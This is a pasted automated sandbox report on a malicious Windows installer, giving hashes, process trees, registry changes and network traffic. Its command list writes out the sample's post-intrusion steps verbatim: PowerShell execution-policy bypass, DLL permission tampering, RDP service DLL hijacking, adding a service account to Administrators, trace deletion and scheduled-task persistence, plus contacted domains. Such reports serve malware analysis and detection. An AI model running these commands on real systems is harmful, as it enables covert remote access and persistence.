Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- * MalFamily: ""
- * MalScore: 10.0
- * File Name: "b548e1df..exe"
- * File Size: 3035258
- * File Type: "PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive"
- * SHA256: "816a093d5242c973a9000051328b95851a5fbf2cfb3c074423c023b35ad963fb"
- * MD5: "239c606e21e3bd309df94221eb3cb68d"
- * SHA1: "5b547b1fdca9e8420d6e1fcf13e4f61504a3f046"
- * SHA512: "3ba0065507dbefa37eddd727f8c267e94b6b20f5cd7efa615df9800c17824fa6f4c3721b7be2edc2832e2309fe382c5446f3f62f8a813241929576d47a77ce75"
- * CRC32: "6E9F40F8"
- * SSDEEP: "49152:2gxhbBonjyatyorA/spFtVxafjCQRz84rYq53/o2qrl2KEa+n2ESPBtl:22rmjyaUorA/2NOjCQbrnFo2qrl/Ea+o"
- * Process Execution:
- "b548e1df..exe",
- "cmd.exe",
- "powershell.exe",
- "takeown.exe",
- "icacls.exe",
- "icacls.exe",
- "icacls.exe",
- "icacls.exe",
- "icacls.exe",
- "icacls.exe",
- "icacls.exe",
- "reg.exe",
- "reg.exe",
- "net.exe",
- "net1.exe",
- "cmd.exe",
- "cmd.exe",
- "services.exe",
- "svchost.exe",
- "WmiPrvSE.exe",
- "svchost.exe",
- "cmd.exe",
- "rundll32.exe",
- "taskhost.exe",
- "svchost.exe",
- "sc.exe",
- "taskhost.exe",
- "svchost.exe",
- "WerFault.exe",
- "svchost.exe",
- "svchost.exe",
- "rundll32.exe",
- "cmd.exe",
- "rundll32.exe"
- * Executed Commands:
- "\"C:\\Windows\\system32\\cmd.exe\" /C powershell -ExecutionPolicy Bypass -f C:\\Users\\user\\AppData\\Local\\Temp\\ZRWLYPDGEH.ps1",
- "powershell -ExecutionPolicy Bypass -f C:\\Users\\user\\AppData\\Local\\Temp\\ZRWLYPDGEH.ps1",
- "\"C:\\Windows\\system32\\takeown.exe\" /A /F rfxvmt.dll",
- "\"C:\\Windows\\system32\\icacls.exe\" rfxvmt.dll /inheritance:d",
- "\"C:\\Windows\\system32\\icacls.exe\" rfxvmt.dll /setowner \"NT SERVICE\\TrustedInstaller\"",
- "\"C:\\Windows\\system32\\icacls.exe\" rfxvmt.dll /grant \"NT SERVICE\\TrustedInstaller:F\"",
- "\"C:\\Windows\\system32\\icacls.exe\" rfxvmt.dll /remove \"NT AUTHORITY\\SYSTEM\"",
- "\"C:\\Windows\\system32\\icacls.exe\" rfxvmt.dll /grant \"NT AUTHORITY\\SYSTEM:RX\"",
- "\"C:\\Windows\\system32\\icacls.exe\" rfxvmt.dll /remove BUILTIN\\Administrators",
- "\"C:\\Windows\\system32\\icacls.exe\" rfxvmt.dll /grant BUILTIN\\Administrators:RX",
- "\"C:\\Windows\\system32\\reg.exe\" ADD \"HKLM\\System\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp\" /v PortNumber /t REG_DWORD /d 0x1C21 /f",
- "\"C:\\Windows\\system32\\reg.exe\" add HKLM\\system\\currentcontrolset\\services\\TermService\\parameters /v ServiceDLL /t REG_EXPAND_SZ /d %SystemRoot%\\help\\tmp5211.dat /f",
- "\"C:\\Windows\\system32\\net.exe\" localgroup Administrators \"NT AUTHORITY\\NETWORK SERVICE\" /add",
- "\"C:\\Windows\\system32\\cmd.exe\" /c del %temp%\\*.ps1 /f",
- "\"C:\\Windows\\system32\\cmd.exe\" /c del %temp%\\*.txt /f",
- "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding",
- "C:\\Windows\\system32\\net1 localgroup Administrators \"NT AUTHORITY\\NETWORK SERVICE\" /add",
- "C:\\Windows\\System32\\svchost.exe -k NetworkService",
- "taskhost.exe $(Arg0)",
- "C:\\Windows\\System32\\svchost.exe -k LocalSystemNetworkRestricted",
- "C:\\Windows\\system32\\sc.exe start w32time task_started",
- "C:\\Windows\\System32\\svchost.exe -k WerSvcGroup",
- "C:\\Windows\\system32\\svchost.exe -k LocalService",
- "C:\\Windows\\system32\\rundll32.exe c:\\windows\\help\\tmp5212.dat, deployns",
- "cmd.exe /c rundll32.exe c:\\windows\\help\\tmp5212.dat, deployns",
- "C:\\Windows\\system32\\WerFault.exe -u -p 2776 -s 288",
- "rundll32.exe c:\\windows\\help\\tmp5212.dat, deployns",
- "cmd.exe /c C:\\Windows\\system32\\rundll32.exe c:\\windows\\help\\tmp5212.dat,, deployns ns launch",
- "C:\\Windows\\system32\\rundll32.exe c:\\windows\\help\\tmp5212.dat,, deployns ns launch",
- "cmd.exe /c start c:\\windows\\temp\\updsvc.exe",
- "cmd.exe /c schtasks /create /tn \"updsvc\" /tr \"c:\\windows\\temp\\updsvc.exe\" /sc onlogon /f"
- * Signatures Detected:
- "Description": "At least one process apparently crashed during execution",
- "Details":
- "Description": "Attempts to connect to a dead IP:Port (4 unique times)",
- "Details":
- "IP": "185.225.17.150:80"
- "IP": "192.35.177.64:80"
- "IP": "184.28.188.218:80"
- "IP": "94.158.245.123:443"
- "Description": "Creates RWX memory",
- "Details":
- "Description": "Possible date expiration check, exits too soon after checking local time",
- "Details":
- "process": "cmd.exe, PID 2948"
- "Description": "A process attempted to delay the analysis task.",
- "Details":
- "Process": "svchost.exe tried to sleep 1381 seconds, actually delayed analysis time by 0 seconds"
- "Process": "powershell.exe tried to sleep 300 seconds, actually delayed analysis time by 0 seconds"
- "Description": "Loads a driver",
- "Details":
- "driver service name": "\\Registry\\Machine\\System\\CurrentControlSet\\Services\\RDPDR"
- "Description": "Expresses interest in specific running processes",
- "Details":
- "process": "rundll32.exe"
- "process": "winlogon.exe"
- "process": "explorer.exe"
- "Description": "Reads data out of its own binary image",
- "Details":
- "self_read": "process: b548e1df..exe, pid: 1944, offset: 0x00000000, length: 0x002e5076"
- "self_read": "process: b548e1df..exe, pid: 1944, offset: 0x00008c1c, length: 0x002dc45e"
- "Description": "A process created a hidden window",
- "Details":
- "Process": "b548e1df..exe -> \"C:\\Windows\\system32\\cmd.exe\""
- "Process": "rundll32.exe -> cmd.exe"
- "Process": "rundll32.exe -> cmd.exe"
- "Description": "Performs some HTTP requests",
- "Details":
- "url": "http://apps.identrust.com/roots/dstrootcax3.p7c"
- "url": "http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab"
- "url": "http://kuarela.xyz/2.txt"
- "Description": "Deletes its original binary from disk",
- "Details":
- "Description": "Tries to suspend Cuckoo threads to prevent logging of malicious activity",
- "Details":
- "Process": "svchost.exe (2660)"
- "Description": "Attempts to stop active services",
- "Details":
- "servicename": "UmRdpService"
- "Description": "Attempts to repeatedly call a single API many times in order to delay analysis time",
- "Details":
- "Spam": "services.exe (500) called API GetSystemTimeAsFileTime 9026716 times"
- "Description": "Attempts to execute a Living Off The Land Binary command for post exeploitation",
- "Details":
- "MITRE T1078 - schtask": "(Tactic: Execution, Persistence, Privilege Escalation)"
- "Description": "Installs itself for autorun at Windows startup",
- "Details":
- "service name": "SvcHlies33"
- "service path": "C:\\Windows\\system32\\rundll32.exe c:\\windows\\help\\tmp5212.dat, deployns "
- "key": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\SvcHlies33\\ImagePath"
- "data": "C:\\Windows\\system32\\rundll32.exe c:\\windows\\help\\tmp5212.dat, deployns "
- "key": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\TermService\\Parameters\\ServiceDLL"
- "data": "%SystemRoot%\\help\\tmp5211.dat"
- "task": "cmd.exe /c schtasks /create /tn \"updsvc\" /tr \"c:\\windows\\temp\\updsvc.exe\" /sc onlogon /f"
- "Description": "Creates a hidden or system file",
- "Details":
- "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms~RF13b03ad.TMP"
- "file": "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\LocalLow\\Microsoft"
- "file": "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache"
- "file": "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData"
- "file": "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content"
- "file": "C:\\Windows\\Temp\\client32.exe"
- "file": "C:\\Windows\\Temp\\HTCTL32.DLL"
- "file": "C:\\Windows\\Temp\\msvcr100.dll"
- "file": "C:\\Windows\\Temp\\nskbfltr.inf"
- "file": "C:\\Windows\\Temp\\NSM.ini"
- "file": "C:\\Windows\\Temp\\NSM.LIC"
- "file": "C:\\Windows\\Temp\\pcicapi.dll"
- "file": "C:\\Windows\\Temp\\PCICHEK.DLL"
- "file": "C:\\Windows\\Temp\\PCICL32.DLL"
- "file": "C:\\Windows\\Temp\\remcmdstub.exe"
- "file": "C:\\Windows\\Temp\\TCCTL32.DLL"
- "Description": "Checks the system manufacturer, likely for anti-virtualization",
- "Details":
- "Description": "Attempts to create or modify system certificates",
- "Details":
- * Started Service:
- "TermService",
- "WerSvc",
- "UmRdpService",
- "W32Time",
- "SvcHlies33"
- * Mutexes:
- "Global\\CLR_CASOFF_MUTEX",
- "TSLicensingLock",
- "Local\\WERReportingForProcess2776",
- "Global\\\\xe5\\x88\\x90\\xc2\\x8f"
- * Modified Files:
- "C:\\Users\\user\\AppData\\Local\\Temp\\ZRWLYPDGEH.ps1",
- "C:\\Users\\user\\AppData\\Local\\Temp\\changes_7521tg.txt",
- "C:\\Users\\user\\AppData\\Local\\Temp\\nsn67D4.tmp\\System.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\%ProgramData%\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\Windows PowerShell.lnk",
- "\\??\\PIPE\\srvsvc",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\LAWERZYQZ6MNMX729YVD.temp",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms~RF13b03ad.TMP",
- "C:\\Windows\\Help\\tmp5211.dat",
- "C:\\Windows\\Help\\tmp5212.dat",
- "C:\\Windows\\Help\\tmp5213.dat",
- "C:\\Windows\\sysnative\\rfxvmt.dll",
- "C:\\Windows\\inf\\setupapi.dev.log",
- "\\??\\pipe\\PIPE_EVENTROOT\\CIMV2PROVIDERSUBSYSTEM",
- "\\??\\PIPE\\samr",
- "\\??\\PIPE\\lsarpc",
- "C:\\Windows\\sysnative\\LogFiles\\Scm\\4963ad21-c4a5-42a5-b9bd-e441d57204fe",
- "C:\\Windows\\sysnative\\LogFiles\\Scm\\7bbc503c-5977-4798-a4ae-61483a7e030d",
- "C:\\Windows\\sysnative\\LogFiles\\Scm\\5869f1c1-01d7-41f7-84b7-715672259fa8",
- "C:\\Windows\\sysnative\\LogFiles\\Scm\\0096502d-e5a8-4303-a737-cba2a8ba171e",
- "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\asogaigsaug.dat",
- "C:\\Windows\\Help\\10278.ps1",
- "\\Device\\Termdd",
- "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\aa.txt",
- "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\E0F5C59F9FA661F6F4C50B87FEF3A15A",
- "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\E0F5C59F9FA661F6F4C50B87FEF3A15A",
- "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\94308059B57B3142E455B38A6EB92015",
- "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\94308059B57B3142E455B38A6EB92015",
- "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\CabEB8.tmp",
- "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\TarEB9.tmp",
- "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\rep706.bin",
- "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\rep704.zip",
- "C:\\Windows\\Temp\\client32.exe",
- "C:\\Windows\\Temp\\client32.ini",
- "C:\\Windows\\Temp\\HTCTL32.DLL",
- "C:\\Windows\\Temp\\msvcr100.dll",
- "C:\\Windows\\Temp\\nskbfltr.inf",
- "C:\\Windows\\Temp\\NSM.ini",
- "C:\\Windows\\Temp\\NSM.LIC",
- "C:\\Windows\\Temp\\pcicapi.dll",
- "C:\\Windows\\Temp\\PCICHEK.DLL",
- "C:\\Windows\\Temp\\PCICL32.DLL",
- "C:\\Windows\\Temp\\remcmdstub.exe",
- "C:\\Windows\\Temp\\TCCTL32.DLL",
- "C:\\Windows\\Temp\\cksini.exe",
- "C:\\Windows\\Temp\\updsvc.exe",
- "\\Device\\RdpDr",
- "\\??\\root#umbus#0000#65a9a6cf-64cd-480b-843e-32c86e1ba19f",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WER4623.tmp.appcompat.txt",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WER4D39.tmp.WERInternalMetadata.xml",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WER50D4.tmp.hdmp",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERE5B2.tmp.mdmp",
- "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_a8bcd9cebc267533cfbc8132deab282e9c9ceb7_cab_076dd36d\\WER4623.tmp.appcompat.txt",
- "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_a8bcd9cebc267533cfbc8132deab282e9c9ceb7_cab_076dd36d\\WER4D39.tmp.WERInternalMetadata.xml",
- "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_a8bcd9cebc267533cfbc8132deab282e9c9ceb7_cab_076dd36d\\WER50D4.tmp.hdmp",
- "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_a8bcd9cebc267533cfbc8132deab282e9c9ceb7_cab_076dd36d\\WERE5B2.tmp.mdmp",
- "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_a8bcd9cebc267533cfbc8132deab282e9c9ceb7_cab_076dd36d\\Report.wer"
- * Deleted Files:
- "C:\\Users\\user\\AppData\\Local\\Temp\\nsx65A1.tmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\nsn67D4.tmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\nsn67D4.tmp\\System.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\nsn67D4.tmp\\",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms~RF13b03ad.TMP",
- "C:\\Users\\user\\AppData\\Local\\Temp\\ZRWLYPDGEH.ps1",
- "C:\\Users\\user\\AppData\\Local\\Temp\\b548e1df..exe",
- "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\CabEB8.tmp",
- "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\TarEB9.tmp",
- "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\rep706.bin",
- "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\rep704.zip",
- "C:\\Windows\\Temp\\client32.exe",
- "C:\\Users\\user\\AppData\\Local\\Temp\\changes_7521tg.txt",
- "C:\\Users\\user\\AppData\\Local\\Temp\\FXSAPIDebugLogFile.txt",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WER4623.tmp",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WER4623.tmp.appcompat.txt",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WER4D39.tmp",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WER4D39.tmp.WERInternalMetadata.xml",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WER50D4.tmp",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WER50D4.tmp.hdmp",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERE5B2.tmp",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERE5B2.tmp.mdmp"
- * Modified Registry Keys:
- "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\LanguageList",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Device Installer\\CurrentStatus",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Device Installer\\CurrentStatus\\StartTime",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Device Installer\\CurrentStatus\\Progress",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Enum\\UMB\\UMB\\1&841921d&0&TSBUS\\Properties",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Enum\\UMB\\UMB\\1&841921d&0&TSBUS\\Properties\\83da6326-97a6-4088-9453-a1923f573b29",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Enum\\UMB\\UMB\\1&841921d&0&TSBUS\\Properties\\83da6326-97a6-4088-9453-a1923f573b29\\00000009",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Enum\\UMB\\UMB\\1&841921d&0&TSBUS\\Properties\\83da6326-97a6-4088-9453-a1923f573b29\\00000009\\00000000",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Enum\\UMB\\UMB\\1&841921d&0&TSBUS\\Properties\\83da6326-97a6-4088-9453-a1923f573b29\\00000009\\00000000\\Type",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Enum\\UMB\\UMB\\1&841921d&0&TSBUS\\Properties\\83da6326-97a6-4088-9453-a1923f573b29\\00000009\\00000000\\Data",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\Setup\\SetupapiLogStatus",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\Setup\\SetupapiLogStatus\\setupapi.dev.log",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\WinStations\\RDP-Tcp\\PortNumber",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\TermService\\Parameters\\ServiceDLL",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\UmRdpService\\Type",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\WerSvc\\Type",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\W32Time\\Type",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\SvcHlies33",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\SvcHlies33\\Type",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\SvcHlies33\\Start",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\SvcHlies33\\ErrorControl",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\SvcHlies33\\ImagePath",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\SvcHlies33\\DisplayName",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\SvcHlies33\\ObjectName",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\fDenyTSConnections",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\FSingleSessionPerUser",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Lsa\\LimitBlankPasswordUse",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\Licensing Core",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\Licensing Core\\EnableConcurrentSessions",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\AllowMultipleTSSessions",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList\\WgaUtilAcc",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\Terminal Services\\fAllowToGetHelp",
- "HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Terminal Server\\RCM\\Secrets",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\RCM\\Secrets\\L$HYDRAENCKEY_28ada6da-d622-11d1-9cb9-00c04fb16e75",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\RCM\\Certificate",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\RCM\\Secrets\\L$HYDRAENCKEY_52d1ad03-4565-44f3-8bfd-bbb0591f4b9d",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\RCM\\CertificateOld",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\\Blob",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\Windows Error Reporting\\Consent",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\Windows Error Reporting\\Consent\\DefaultConsent",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\W32Time\\TimeProviders\\NtpClient\\SpecialPollTimeRemaining"
- * Deleted Registry Keys:
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\RCM\\OverrideProtocol_Object",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\DAC9024F54D8F6DF94935FB1732638CA6AD77C13"
- * DNS Communications:
- "type": "A",
- "request": "fdguyt5ggs.xyz",
- "answers":
- "data": "94.158.245.123",
- "type": "A"
- "type": "A",
- "request": "apps.identrust.com",
- "answers":
- "data": "192.35.177.64",
- "type": "A"
- "data": "apps.digsigtrust.com",
- "type": "CNAME"
- "type": "A",
- "request": "kuarela.xyz",
- "answers":
- "data": "185.225.17.150",
- "type": "A"
- * Domains:
- "ip": "94.158.245.123",
- "domain": "fdguyt5ggs.xyz"
- "ip": "185.225.17.150",
- "domain": "kuarela.xyz"
- "ip": "192.35.177.64",
- "domain": "apps.identrust.com"
- * Network Communication - ICMP:
- * Network Communication - HTTP:
- "count": 1,
- "body": "",
- "uri": "http://apps.identrust.com/roots/dstrootcax3.p7c",
- "user-agent": "Microsoft-CryptoAPI/6.1",
- "method": "GET",
- "host": "apps.identrust.com",
- "version": "1.1",
- "path": "/roots/dstrootcax3.p7c",
- "data": "GET /roots/dstrootcax3.p7c HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: apps.identrust.com\r\n\r\n",
- "port": 80
- "count": 1,
- "body": "",
- "uri": "http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab",
- "user-agent": "Microsoft-CryptoAPI/6.1",
- "method": "GET",
- "host": "www.download.windowsupdate.com",
- "version": "1.1",
- "path": "/msdownload/update/v3/static/trustedr/en/authrootstl.cab",
- "data": "GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP/1.1\r\nCache-Control: max-age = 88273\r\nConnection: Keep-Alive\r\nAccept: */*\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: www.download.windowsupdate.com\r\n\r\n",
- "port": 80
- "count": 1,
- "body": "",
- "uri": "http://kuarela.xyz/2.txt",
- "user-agent": "Embarcadero URI Client/1.0",
- "method": "GET",
- "host": "kuarela.xyz",
- "version": "1.1",
- "path": "/2.txt",
- "data": "GET /2.txt HTTP/1.1\r\nConnection: Keep-Alive\r\nUser-Agent: Embarcadero URI Client/1.0\r\nHost: kuarela.xyz\r\n\r\n",
- "port": 80
- * Network Communication - SMTP:
- * Network Communication - Hosts:
- * Network Communication - IRC:
Add Comment
Please, Sign In to add comment